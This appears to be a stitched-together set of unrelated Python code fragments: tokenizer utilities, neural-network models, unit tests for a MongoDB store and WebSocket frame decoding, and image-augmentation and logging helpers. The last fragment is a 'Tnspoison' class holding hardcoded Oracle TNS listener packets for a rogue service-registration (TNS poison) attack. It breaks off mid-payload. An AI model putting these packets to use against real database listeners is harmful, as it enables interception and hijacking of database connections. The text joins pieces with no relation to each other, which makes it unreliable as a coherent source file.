logger.warning('Unable to convert output to tensors format {}, PyTorch or TensorFlow is not available.'.format(return_tensors))
return encoded_inputs
def truncate_sequences(self, ids, pair_ids=None, num_tokens_to_remove=0, truncation_strategy='longest_first', stride=0):
if (num_tokens_to_remove <= 0):
return (ids, pair_ids, [])
if (truncation_strategy == 'longest_first'):
overflowing_tokens = []
for _ in range(num_tokens_to_remove):
if ((pair_ids is None) or (len(ids) > len(pair_ids))):
overflowing_tokens = ([ids[(- 1)]] + overflowing_tokens)
ids = ids[:(- 1)]
else:
pair_ids = pair_ids[:(- 1)]
window_len = min(len(ids), stride)
if (window_len > 0):
overflowing_tokens = (ids[(- window_len):] + overflowing_tokens)
elif (truncation_strategy == 'only_first'):
assert (len(ids) > num_tokens_to_remove)
window_len = min(len(ids), (stride + num_tokens_to_remove))
overflowing_tokens = ids[(- window_len):]
ids = ids[:(- num_tokens_to_remove)]
elif (truncation_strategy == 'only_second'):
assert ((pair_ids is not None) and (len(pair_ids) > num_tokens_to_remove))
window_len = min(len(pair_ids), (stride + num_tokens_to_remove))
overflowing_tokens = pair_ids[(- window_len):]
pair_ids = pair_ids[:(- num_tokens_to_remove)]
elif (truncation_strategy == 'do_not_truncate'):
raise ValueError('Input sequence are too long for max_length. Please select a truncation strategy.')
else:
raise ValueError("Truncation_strategy should be selected in ['longest_first', 'only_first', 'only_second', 'do_not_truncate']")
return (ids, pair_ids, overflowing_tokens)
def create_token_type_ids_from_sequences(self, token_ids_0, token_ids_1=None):
if (token_ids_1 is None):
return (len(token_ids_0) * [0])
return (([0] * len(token_ids_0)) + ([1] * len(token_ids_1)))
def build_inputs_with_special_tokens(self, token_ids_0, token_ids_1=None):
if (token_ids_1 is None):
return token_ids_0
return (token_ids_0 + token_ids_1)
def get_special_tokens_mask(self, token_ids_0, token_ids_1=None, already_has_special_tokens=False):
return ([0] * ((len(token_ids_1) if token_ids_1 else 0) + len(token_ids_0)))
def convert_ids_to_tokens(self, ids, skip_special_tokens=False):
if isinstance(ids, int):
if (ids in self.added_tokens_decoder):
return self.added_tokens_decoder[ids]
else:
return self._convert_id_to_token(ids)
tokens = []
for index in ids:
index = int(index)
if (skip_special_tokens and (index in self.all_special_ids)):
continue
if (index in self.added_tokens_decoder):
tokens.append(self.added_tokens_decoder[index])
else:
tokens.append(self._convert_id_to_token(index))
return tokens
def _convert_id_to_token(self, index):
raise NotImplementedError
def convert_tokens_to_string(self, tokens):
return ' '.join(self.convert_ids_to_tokens(tokens))
def decode(self, token_ids, skip_special_tokens=False, clean_up_tokenization_spaces=True):
filtered_tokens = self.convert_ids_to_tokens(token_ids, skip_special_tokens=skip_special_tokens)
sub_texts = []
current_sub_text = []
for token in filtered_tokens:
if (skip_special_tokens and (token in self.all_special_ids)):
continue
if (token in self.added_tokens_encoder):
if current_sub_text:
sub_texts.append(self.convert_tokens_to_string(current_sub_text))
current_sub_text = []
sub_texts.append(token)
else:
current_sub_text.append(token)
if current_sub_text:
sub_texts.append(self.convert_tokens_to_string(current_sub_text))
text = ' '.join(sub_texts)
if clean_up_tokenization_spaces:
clean_text = self.clean_up_tokenization(text)
return clean_text
else:
return text
def special_tokens_map(self):
set_attr = {}
for attr in self.SPECIAL_TOKENS_ATTRIBUTES:
attr_value = getattr(self, ('_' + attr))
if attr_value:
set_attr[attr] = attr_value
return set_attr
def all_special_tokens(self):
all_toks = []
set_attr = self.special_tokens_map
for attr_value in set_attr.values():
all_toks = (all_toks + (list(attr_value) if isinstance(attr_value, (list, tuple)) else [attr_value]))
all_toks = list(set(all_toks))
return all_toks
def all_special_ids(self):
all_toks = self.all_special_tokens
all_ids = self.convert_tokens_to_ids(all_toks)
return all_ids
def clean_up_tokenization(out_string):
out_string = out_string.replace(' .', '.').replace(' ?', '?').replace(' !', '!').replace(' ,', ',').replace(" ' ", "'").replace(" n't", "n't").replace(" 'm", "'m").replace(' do not', " don't").replace(" 's", "'s").replace(" 've", "'ve").replace(" 're", "'re")
return out_string |
class CIFARQuick(HybridBlock):
def __init__(self, block, fix_layers, pooling, channels, classes, fix_conv=False, **kwargs):
super(CIFARQuick, self).__init__()
self.fix_conv = fix_conv
self.fix_layers = fix_layers
assert ('fw' in kwargs.keys()), 'no_fw'
self.fw = kwargs['fw']
assert ('fix_fc' in kwargs.keys()), 'no_fix_fc'
self.fix_fc = kwargs['fix_fc']
with self.name_scope():
self.feats1 = nn.HybridSequential()
self.feats1.add(block(channels[0], 5, 1, 2, pooling[0]))
self.feats2 = nn.HybridSequential()
self.feats2.add(block(channels[1], 5, 1, 2, pooling[1]))
self.feats3 = nn.HybridSequential()
self.feats3.add(block(channels[2], 5, 1, 2, pooling[2]))
self.feats3.add(nn.Flatten())
self.fc1 = nn.Dense(64, use_bias=False)
self.fc2 = nn.Dense(classes, use_bias=False)
self.fc3 = nn.Dense(5, use_bias=False)
self.fc4 = nn.Dense(5, use_bias=False)
self.fc5 = nn.Dense(5, use_bias=False)
self.fc6 = nn.Dense(5, use_bias=False)
self.fc7 = nn.Dense(5, use_bias=False)
self.fc8 = nn.Dense(5, use_bias=False)
self.fc9 = nn.Dense(5, use_bias=False)
self.fc10 = nn.Dense(5, use_bias=False)
def hybrid_forward(self, F, x, num=0, fix_conv=False):
if (self.fix_layers == 0):
out = F.L2Normalization(self.fc1(self.feats3(self.feats2(self.feats1(x)))))
elif (self.fix_layers == 1):
with ag.pause():
x = self.feats1(x)
out = F.L2Normalization(self.fc1(self.feats3(self.feats2(x))))
elif (self.fix_layers == 2):
with ag.pause():
x = self.feats2(self.feats1(x))
out = F.L2Normalization(self.fc1(self.feats3(x)))
elif (self.fix_layers == 3):
if self.fix_fc:
with ag.pause():
x = self.fc1(self.feats3(self.feats2(self.feats1(x))))
out = F.L2Normalization(x)
else:
with ag.pause():
x = self.feats3(self.feats2(self.feats1(x)))
out = F.L2Normalization(self.fc1(x))
if self.fw:
for i in range((num + 1)):
if (i < num):
with ag.pause():
fc = eval(('self.fc' + str((i + 2))))
if (i == 0):
output = fc(out)
else:
output = mx.nd.concat(output, fc(out), dim=1)
else:
fc = eval(('self.fc' + str((i + 2))))
if (i == 0):
output = fc(out)
else:
output = mx.nd.concat(output, fc(out), dim=1)
return (out, output)
else:
for i in range((num + 1)):
fc = eval(('self.fc' + str((i + 2))))
if (i == 0):
output = fc(out)
else:
output = mx.nd.concat(output, fc(out), dim=1)
return (out, output) |
class TestModel(BaseModel):
def name(self):
return 'TestModel'
def modify_commandline_options(parser, is_train=True):
assert (not is_train), 'TestModel cannot be used in train mode'
parser = CycleGANModel.modify_commandline_options(parser, is_train=False)
parser.set_defaults(dataset_mode='single')
parser.set_defaults(pool_size=0, no_lsgan=True, norm='batch')
parser.add_argument('--model_suffix', type=str, default='', help='In checkpoints_dir, [which_epoch]_net_G[model_suffix].pth will be loaded as the generator of TestModel')
return parser
def initialize(self, opt):
assert (not opt.isTrain)
BaseModel.initialize(self, opt)
self.loss_names = []
self.visual_names = ['real_A', 'fake_B']
self.model_names = [('G' + opt.model_suffix)]
if (opt.which_model_netG == 'vnet'):
self.netG = VNet()
self.netG.to(self.device)
self.netG = torch.nn.DataParallel(self.netG, self.gpu_ids)
elif (opt.which_model_netG == 'motion'):
self.netG = Net_3d_Test()
self.netG.to(self.device)
self.netG = torch.nn.DataParallel(self.netG, self.gpu_ids)
elif (opt.which_model_netG == 'unet3d'):
self.netG = UNet3D_FLOW_no(2, 3)
self.netG.to(self.device)
self.netG = torch.nn.DataParallel(self.netG, self.gpu_ids)
elif (opt.which_model_netG == 'unet3d_deep'):
self.netG = UNet3D_deep(1, 2)
self.netG.to(self.device)
self.netG = torch.nn.DataParallel(self.netG, self.gpu_ids)
else:
self.netG = networks.define_G((opt.input_nc * 3), (opt.output_nc * 2), opt.ngf, opt.which_model_netG, opt.norm, (not opt.no_dropout), opt.init_type, opt.init_gain, self.gpu_ids)
setattr(self, ('netG' + opt.model_suffix), self.netG)
if ((opt.which_model_netG == 'vnet') or (opt.which_model_netG == 'unet3d_deep')):
self.netG.load_state_dict(torch.load(opt.net3d_dir_G))
elif ((opt.which_model_netG == 'vnet3d') or (opt.which_model_netG == 'motion')):
self.netG.load_state_dict(torch.load(opt.net3d_dir_G))
else:
self.load_networks(opt.which_epoch)
self.print_networks(opt.verbose)
def set_input(self, combined_image1, combined_image2, move_image, fix_image):
self.combined_image1 = combined_image1.to(self.device)
self.move_image = move_image.to(self.device)
self.combined_image2 = combined_image2.to(self.device)
self.fix_image = fix_image.to(self.device)
def test(self):
(field12, field21) = self.netG(self.combined_image1, self.combined_image2, self.move_image, self.fix_image)
return (field12, field21) |
class MongoStoreTests(TestCase):
def setUp(self):
self.db_hosts = ['localhost']
self.db_name = ('coal-mine-test-' + str(uuid.uuid4()))
self.db_conn = MongoClient()
self.db = self.db_conn[self.db_name]
self.store = MongoStore(self.db_hosts, self.db_name, None, None)
def tearDown(self):
self.db_conn.drop_database(self.db)
def test_create(self):
self.store.create({'id': 'abcdefgh'})
def test_update_noop(self):
self.store.create({'id': 'abcdefgh'})
self.store.update('abcdefgh', {})
def test_update_set(self):
self.store.create({'id': 'abcdefgh'})
self.store.update('abcdefgh', {'periodicity': 10})
self.assertEqual(self.store.get('abcdefgh')['periodicity'], 10)
def test_update_unset(self):
self.store.create({'id': 'abcdefgh'})
self.store.update('abcdefgh', {'periodicity': 10})
self.store.update('abcdefgh', {'periodicity': None})
self.assertNotIn('periodicity', self.store.get('abcdefgh'))
def test_get_nonexistent(self):
with self.assertRaises(KeyError):
self.store.get('abcdefgh')
def test_list(self):
self.store.create({'id': 'abcdefgh', 'name': 'freedle', 'periodicity': 600, 'paused': False, 'late': False})
iterator = self.store.list()
next(iterator)
with self.assertRaises(StopIteration):
next(iterator)
next(self.store.list(verbose=True))
next(self.store.list(paused=False))
next(self.store.list(late=False))
next(self.store.list(order_by='deadline'))
next(self.store.list(search='freedle'))
def test_upcoming_deadlines(self):
self.store.create({'id': 'abcdefgh', 'paused': False, 'late': False})
next(self.store.upcoming_deadlines())
def test_delete(self):
self.store.create({'id': 'abcdefgh'})
self.store.delete('abcdefgh')
with self.assertRaises(KeyError):
self.store.delete('abcdefgh')
def test_find_identifier(self):
self.store.create({'id': 'abcdefgh', 'slug': 'froodle'})
self.assertEqual(self.store.find_identifier('froodle'), 'abcdefgh')
with self.assertRaises(KeyError):
self.store.find_identifier('freedle') |
class PreprocessForEfficientRouletteSelectionTest(unittest.TestCase):
def assertPreprocess(self, weights):
(alternates, keep_chances) = _preprocess_for_efficient_roulette_selection(weights)
self.assertEqual(len(alternates), len(keep_chances))
target_weight = (sum(weights) // len(alternates))
distribution = list(keep_chances)
for i in range(len(alternates)):
distribution[alternates[i]] += (target_weight - keep_chances[i])
self.assertEqual(weights, distribution)
return (alternates, keep_chances)
def test_fuzz(self):
random.seed(8)
for _ in range(100):
n = random.randint(1, 50)
weights = [random.randint(0, 100) for _ in range(n)]
weights[(- 1)] += (n - (sum(weights) % n))
self.assertPreprocess(weights)
def test_validation(self):
with self.assertRaises(ValueError):
_ = self.assertPreprocess(weights=[])
with self.assertRaises(ValueError):
_ = self.assertPreprocess(weights=[1, 2])
with self.assertRaises(ValueError):
_ = self.assertPreprocess(weights=[3, 3, 2])
def test_already_uniform(self):
self.assertEqual(self.assertPreprocess(weights=[1]), ([0], [0]))
self.assertEqual(self.assertPreprocess(weights=[1, 1]), ([0, 1], [0, 0]))
self.assertEqual(self.assertPreprocess(weights=[1, 1, 1]), ([0, 1, 2], [0, 0, 0]))
self.assertEqual(self.assertPreprocess(weights=[2, 2, 2]), ([0, 1, 2], [0, 0, 0]))
def test_donation(self):
self.assertEqual(self.assertPreprocess(weights=[1, 2, 3]), ([2, 1, 2], [1, 0, 0]))
self.assertEqual(self.assertPreprocess(weights=[3, 1, 2]), ([0, 0, 2], [0, 1, 0]))
self.assertEqual(self.assertPreprocess(weights=[5, 1, 0]), ([0, 0, 0], [0, 1, 0]))
def test_over_donation(self):
self.assertEqual(self.assertPreprocess(weights=[3, 0, 3]), ([2, 0, 2], [1, 0, 0])) |
def patchify_augmentation(args, batch):
aug_batch = dict()
img = batch['image']
label = batch['label']
batch_size = img.size()[0]
patch_dim = (img.size()[(- 1)] // args.mask_patch_size)
images_patch = rearrange(img, 'b c (h p1) (w p2) (d p3) -> (b h w d) c p1 p2 p3 ', p1=(args.mask_patch_size // 2), p2=args.mask_patch_size, p3=args.mask_patch_size)
labels_patch = rearrange(label, 'b c (h p1) (w p2) (d p3) -> (b h w d) c p1 p2 p3 ', p1=(args.mask_patch_size // 2), p2=args.mask_patch_size, p3=args.mask_patch_size)
mask = np.ones(images_patch.size()[0])
if args.add_contrast_mask:
num_patches = (images_patch.shape[0] // (args.mask_scale ** 3))
num_mask = int((args.mask_ratio * num_patches))
mask_index = np.random.permutation(num_patches)[:num_mask]
mask = np.zeros(num_patches, dtype=int)
mask[mask_index] = 1
mask = mask.reshape(batch_size, (patch_dim // args.mask_scale), (patch_dim // args.mask_scale), (patch_dim // args.mask_scale))
if (args.mask_scale > 1):
mask = mask.repeat(args.mask_scale, axis=1).repeat(args.mask_scale, axis=2).repeat(args.mask_scale, axis=3)
mask = mask.reshape((- 1))
noise_mask = torch.normal(mean=torch.zeros((num_mask * (args.mask_scale ** 3)), 1, (args.mask_patch_size // 2), args.mask_patch_size, args.mask_patch_size), std=(0.1 * torch.ones((num_mask * (args.mask_scale ** 3)), 1, (args.mask_patch_size // 2), args.mask_patch_size, args.mask_patch_size)))
images_patch[(mask == 1)] = noise_mask
aug_list = get_augmentation(args)
aug_batch['image'] = images_patch
aug_batch['label'] = labels_patch
aug_batch = aug_list(aug_batch)
feature_size = (img.shape[2] // args.mask_patch_size)
aug_batch['image'] = rearrange(aug_batch['image'], '(b h w d) c p1 p2 p3 -> b c (h p1) (w p2) (d p3)', h=patch_dim, w=patch_dim, d=patch_dim)
aug_batch['label'] = rearrange(aug_batch['label'], '(b h w d) c p1 p2 p3 -> b c (h p1) (w p2) (d p3)', h=patch_dim, w=patch_dim, d=patch_dim)
return (aug_batch, mask) |
def test_clip_column():
assert (_utils.clip_column(0, [], 0) == 0)
assert (_utils.clip_column(2, ['123'], 0) == 2)
assert (_utils.clip_column(3, ['123'], 0) == 3)
assert (_utils.clip_column(5, ['123'], 0) == 3)
assert (_utils.clip_column(0, ['\n', '123'], 0) == 0)
assert (_utils.clip_column(1, ['\n', '123'], 0) == 0)
assert (_utils.clip_column(2, ['123\n', '123'], 0) == 2)
assert (_utils.clip_column(3, ['123\n', '123'], 0) == 3)
assert (_utils.clip_column(4, ['123\n', '123'], 1) == 3) |
def new_export_path_for_album(album_id: AlbumId) -> Path:
stem = f'{album_id.title} - {album_id.artist}'
path = Path(join_path_with_escaped_name_of_legal_length(str(EXPORT_DIR_PATH), stem, EXPORT_EXTENSION))
trim_count = 1
while path.exists():
new_stem = (path.stem[:(- trim_count)] + uuid.uuid4().hex[:trim_count])
trim_count += 1
path = path.with_name(f'{new_stem}.{EXPORT_EXTENSION}')
return path |
def fix_lyft(root_folder='./data/lyft', version='v1.01'):
lidar_path = 'lidar/host-a011_lidar1_.bin'
root_folder = os.path.join(root_folder, f'{version}-train')
lidar_path = os.path.join(root_folder, lidar_path)
assert os.path.isfile(lidar_path), f'Please download the complete Lyft dataset and make sure {lidar_path} is present.'
points = np.fromfile(lidar_path, dtype=np.float32, count=(- 1))
try:
points.reshape([(- 1), 5])
print(f'This fix is not required for version {version}.')
except ValueError:
new_points = np.array((list(points) + [100.0, 1.0]), dtype='float32')
new_points.tofile(lidar_path)
print(f'Appended 100.0 and 1.0 to the end of {lidar_path}.') |
class FilterLogoPlacementsSerializer(serializers.Serializer):
publisher = serializers.ChoiceField(choices=[(c.value, c.name.replace('_', ' ').title()) for c in PublisherChoices], required=False)
flight = serializers.ChoiceField(choices=[(c.value, c.name.replace('_', ' ').title()) for c in LogoPlacementChoices], required=False)
def by_publisher(self):
return self.validated_data.get('publisher')
def by_flight(self):
return self.validated_data.get('flight')
def skip_logo(self, logo):
if (self.by_publisher and (self.by_publisher != logo.publisher)):
return True
if (self.by_flight and (self.by_flight != logo.logo_place)):
return True
else:
return False |
class MatchedMolecularPair(object):
__slots__ = ('id1', 'id2', 'smirks', 'constant_smiles', 'min_constant_radius', 'max_constant_radius')
def __init__(self, id1, id2, smirks, constant_smiles, min_constant_radius, max_constant_radius):
self.id1 = id1
self.id2 = id2
self.smirks = smirks
self.constant_smiles = constant_smiles
self.min_constant_radius = min_constant_radius
self.max_constant_radius = max_constant_radius |
class TestFrameDecoderExtensions():
class FakeExtension(wpext.Extension):
name = 'fake'
def __init__(self) -> None:
self._inbound_header_called = False
self._inbound_rsv_bit_set = False
self._inbound_payload_data_called = False
self._inbound_complete_called = False
self._fail_inbound_complete = False
self._outbound_rsv_bit_set = False
def enabled(self) -> bool:
return True
def offer(self) -> Union[(bool, str)]:
return 'fake'
def frame_inbound_header(self, proto: Union[(fp.FrameDecoder, fp.FrameProtocol)], opcode: fp.Opcode, rsv: fp.RsvBits, payload_length: int) -> Union[(fp.CloseReason, fp.RsvBits)]:
self._inbound_header_called = True
if (opcode is fp.Opcode.PONG):
return fp.CloseReason.MANDATORY_EXT
self._inbound_rsv_bit_set = rsv.rsv3
return fp.RsvBits(False, False, True)
def frame_inbound_payload_data(self, proto: Union[(fp.FrameDecoder, fp.FrameProtocol)], data: bytes) -> Union[(bytes, fp.CloseReason)]:
self._inbound_payload_data_called = True
if (data == b'party time'):
return fp.CloseReason.POLICY_VIOLATION
elif (data == b'ragequit'):
self._fail_inbound_complete = True
if self._inbound_rsv_bit_set:
data = data.decode('utf-8').upper().encode('utf-8')
return data
def frame_inbound_complete(self, proto: Union[(fp.FrameDecoder, fp.FrameProtocol)], fin: bool) -> Union[(bytes, fp.CloseReason, None)]:
self._inbound_complete_called = True
if self._fail_inbound_complete:
return fp.CloseReason.ABNORMAL_CLOSURE
if (fin and self._inbound_rsv_bit_set):
return 'TM'.encode()
return None
def frame_outbound(self, proto: Union[(fp.FrameDecoder, fp.FrameProtocol)], opcode: fp.Opcode, rsv: fp.RsvBits, data: bytes, fin: bool) -> Tuple[(fp.RsvBits, bytes)]:
if (opcode is fp.Opcode.TEXT):
rsv = fp.RsvBits(rsv.rsv1, rsv.rsv2, True)
self._outbound_rsv_bit_set = True
if (fin and self._outbound_rsv_bit_set):
data += ''.encode()
self._outbound_rsv_bit_set = False
return (rsv, data)
def test_rsv_bit(self) -> None:
ext = self.FakeExtension()
decoder = fp.FrameDecoder(client=True, extensions=[ext])
frame_bytes = b'\x91\x00'
decoder.receive_bytes(frame_bytes)
frame = decoder.process_buffer()
assert (frame is not None)
assert ext._inbound_header_called
assert ext._inbound_rsv_bit_set
def test_wrong_rsv_bit(self) -> None:
ext = self.FakeExtension()
decoder = fp.FrameDecoder(client=True, extensions=[ext])
frame_bytes = b'\xa1\x00'
decoder.receive_bytes(frame_bytes)
with pytest.raises(fp.ParseFailed) as excinfo:
decoder.receive_bytes(frame_bytes)
decoder.process_buffer()
assert (excinfo.value.code is fp.CloseReason.PROTOCOL_ERROR)
def test_header_error_handling(self) -> None:
ext = self.FakeExtension()
decoder = fp.FrameDecoder(client=True, extensions=[ext])
frame_bytes = b'\x9a\x00'
decoder.receive_bytes(frame_bytes)
with pytest.raises(fp.ParseFailed) as excinfo:
decoder.receive_bytes(frame_bytes)
decoder.process_buffer()
assert (excinfo.value.code is fp.CloseReason.MANDATORY_EXT)
def test_payload_processing(self) -> None:
ext = self.FakeExtension()
decoder = fp.FrameDecoder(client=True, extensions=[ext])
payload = 'fnor'
expected_payload = payload.upper().encode('utf-8')
bytes_payload = payload.encode('utf-8')
frame_bytes = ((b'\x11' + bytearray([len(bytes_payload)])) + bytes_payload)
decoder.receive_bytes(frame_bytes)
frame = decoder.process_buffer()
assert (frame is not None)
assert ext._inbound_header_called
assert ext._inbound_rsv_bit_set
assert ext._inbound_payload_data_called
assert (frame.payload == expected_payload)
def test_no_payload_processing_when_not_wanted(self) -> None:
ext = self.FakeExtension()
decoder = fp.FrameDecoder(client=True, extensions=[ext])
payload = 'fnor'
expected_payload = payload.encode('utf-8')
bytes_payload = payload.encode('utf-8')
frame_bytes = ((b'\x01' + bytearray([len(bytes_payload)])) + bytes_payload)
decoder.receive_bytes(frame_bytes)
frame = decoder.process_buffer()
assert (frame is not None)
assert ext._inbound_header_called
assert (not ext._inbound_rsv_bit_set)
assert ext._inbound_payload_data_called
assert (frame.payload == expected_payload)
def test_payload_error_handling(self) -> None:
ext = self.FakeExtension()
decoder = fp.FrameDecoder(client=True, extensions=[ext])
payload = b'party time'
frame_bytes = ((b'\x91' + bytearray([len(payload)])) + payload)
decoder.receive_bytes(frame_bytes)
with pytest.raises(fp.ParseFailed) as excinfo:
decoder.receive_bytes(frame_bytes)
decoder.process_buffer()
assert (excinfo.value.code is fp.CloseReason.POLICY_VIOLATION)
def test_frame_completion(self) -> None:
ext = self.FakeExtension()
decoder = fp.FrameDecoder(client=True, extensions=[ext])
payload = 'fnor'
expected_payload = (payload + 'TM').upper().encode('utf-8')
bytes_payload = payload.encode('utf-8')
frame_bytes = ((b'\x91' + bytearray([len(bytes_payload)])) + bytes_payload)
decoder.receive_bytes(frame_bytes)
frame = decoder.process_buffer()
assert (frame is not None)
assert ext._inbound_header_called
assert ext._inbound_rsv_bit_set
assert ext._inbound_payload_data_called
assert ext._inbound_complete_called
assert (frame.payload == expected_payload)
def test_no_frame_completion_when_not_wanted(self) -> None:
ext = self.FakeExtension()
decoder = fp.FrameDecoder(client=True, extensions=[ext])
payload = 'fnor'
expected_payload = payload.encode('utf-8')
bytes_payload = payload.encode('utf-8')
frame_bytes = ((b'\x81' + bytearray([len(bytes_payload)])) + bytes_payload)
decoder.receive_bytes(frame_bytes)
frame = decoder.process_buffer()
assert (frame is not None)
assert ext._inbound_header_called
assert (not ext._inbound_rsv_bit_set)
assert ext._inbound_payload_data_called
assert ext._inbound_complete_called
assert (frame.payload == expected_payload)
def test_completion_error_handling(self) -> None:
ext = self.FakeExtension()
decoder = fp.FrameDecoder(client=True, extensions=[ext])
payload = b'ragequit'
frame_bytes = ((b'\x91' + bytearray([len(payload)])) + payload)
decoder.receive_bytes(frame_bytes)
with pytest.raises(fp.ParseFailed) as excinfo:
decoder.receive_bytes(frame_bytes)
decoder.process_buffer()
assert (excinfo.value.code is fp.CloseReason.ABNORMAL_CLOSURE)
def test_outbound_handling_single_frame(self) -> None:
ext = self.FakeExtension()
proto = fp.FrameProtocol(client=False, extensions=[ext])
payload = ''
data = proto.send_data(payload, fin=True)
payload_bytes = (payload + '').encode('utf8')
assert (data == ((b'\x91' + bytearray([len(payload_bytes)])) + payload_bytes))
def test_outbound_handling_multiple_frames(self) -> None:
ext = self.FakeExtension()
proto = fp.FrameProtocol(client=False, extensions=[ext])
payload = ''
data = proto.send_data(payload, fin=False)
payload_bytes = payload.encode('utf8')
assert (data == ((b'\x11' + bytearray([len(payload_bytes)])) + payload_bytes))
payload = ' \\_()_/ '
data = proto.send_data(payload, fin=True)
payload_bytes = (payload + '').encode('utf8')
assert (data == ((b'\x80' + bytearray([len(payload_bytes)])) + payload_bytes)) |
def save_video(video_frames, filename):
import cv2
_make_dir(filename)
video_frames = np.flip(video_frames, axis=(- 1))
fourcc = cv2.VideoWriter_fourcc(*'MJPG')
fps = 30.0
(height, width, _) = video_frames[0].shape
writer = cv2.VideoWriter(filename, fourcc, fps, (width, height))
for video_frame in video_frames:
writer.write(video_frame)
writer.release() |
class ErrorHandling():
_error_messages = []
def error_logging(cls, func):
logger = qf_logger.getChild(__class__.__name__)
def wrapped_function(*args, **kwargs):
try:
return func(*args, **kwargs)
except Exception as e:
error_message = '{}: An error occurred while processing the function {}.\n {}'.format(e.__class__.__name__, func.__name__, traceback.format_exc())
logger.error(error_message)
cls._error_messages.append(error_message)
return wrapped_function
def class_error_logging(cls):
def wrap(wrapped_cls):
for (function_name, function) in inspect.getmembers(wrapped_cls, inspect.isfunction):
setattr(wrapped_cls, function_name, cls.error_logging(function))
return wrapped_cls
return wrap
def get_error_messages(cls):
return cls._error_messages
def reset_error_messages(cls):
old_messages = cls._error_messages
cls._error_messages = []
return old_messages |
class Tnspoison(Tnscmd):
PACKET_REGISTER = b'\x00h\x00\x00\x01\x00\x00\x00\x019\x01,\x00\x81\x08\x00\x7f\xff\x7f\x08\x00\x00\x01\x00\x00.\x00:\x00\x00\x07\xf8\x0c\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00(CONNECT_DATA=(COMMAND=service_register_NSGR))'
PACKET_TNSPOISON_SID_2 = b'\x05~\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x05t$\x08\xff\x03\x01\x00\x1244xx4x\x10\x102\x102\x102Tv\x102\x102Tv\x00x\x102Tv\x00\x00H\x00\x00\x80\x02\x00\x00\x00\x00\x04\x00\x00\xc0\xe9F\x0b\x00\x00\x00\x00\x90\x00#\x00\x00\x00BEC76C2CC136-5F9F-E034-0003BA1374B3\x03\x00e\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\xfc\x04\x00\x80\x05\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x10\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x80\xf5-\x0b\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xb0\x00N\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc8\xa8E\x0b\x00\x00\x00\x00\xf9&\xe6!\x8b\x80Nj\xbd\x8dwi\xbfN;S\x03\x00\x00\x00\x00\x00\x00\x00\xe0E\xac%\xff\x07\x00\x00\x17\x00\x00\x00\x00\x00\x00\x00\x88\x02N\x0b\x00\x00\x00\x00\n\x00\x00\x00d\x00\x00\x00\x01\x00\x00\x00\xf7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00h\xf5-\x0b\x00\x00\x00\x00or\x00(HOST=192.168.133.1 )\x00\x01\x00\x00\x00\x06\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00x\xa9\xff\x1f\xff\x07\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00P\xa9\xff\x1f\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00X\xa7E\x0b\x00\x00\x00\x00orXDB\x00\x06\x00\x00\x00\x00\x00\x00\x00x\xa9\xff\x1f\xff\x07\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00p\x8fE\x0b\x00\x00\x00\x00orXDB\x00\x01\x00\x00\x00\x03\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xc8\xd9\xa8%\xff\x07\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xa0\xd9\xa8%\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa0\xa6E\x0b\x00\x00\x00\x00or\x00\x03\x00\x00\x00\x00\x00\x00\x00\xc8\xd9\xa8%\xff\x07\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x18\xfc-\x0b\x00\x00\x00\x00or\x00\x01\x00\x00\x00E\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xf0\x80\x85%\xff\x07\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00PfN\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\xa9E\x0b\x00\x00\x00\x00(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=192.168.56.1)(PORT=1521)))\x00E\x00\x00\x00\x00\x00\x00\x00\xf0\x80\x85%\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe0\xa5E\x0b\x00\x00\x00\x00(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=192.168.56.1)(PORT=1521)))\x00\x01\x00\x00\x00\x10\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xb8\x97E\x0b\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x90fN\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\xa8E\x0b\x00\x00\x00\x00\\xacG2\\xe3f\xc7Lt\xc2\x05\x00\x00\x00\x00\x00\x00\x00`Z\xf6!\xff\x07\x00\x00;\x00\x00\x00\x00\x00\x00\x00\xe0\x91\x94%\xff\x07\x00\x001\x00\x00\x00\x00\x00\x00\x00\xfcfN\x0b\x00\x00\x00\x00\x00\x00\x00\x00\xfe\x03\x00\x00\x04\x10\x00\x00\x01\x00\x00\x00\xc8X\xea\x1f\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa0\x97E\x0b\x00\x00\x00\x00D000\x00(ADDRESS=(PROTOCOL=tcp)(HOST=192.168.133.1 )(PORT=49180))\x00DISPATCHER <machine: 192.168.133.1 , pid: 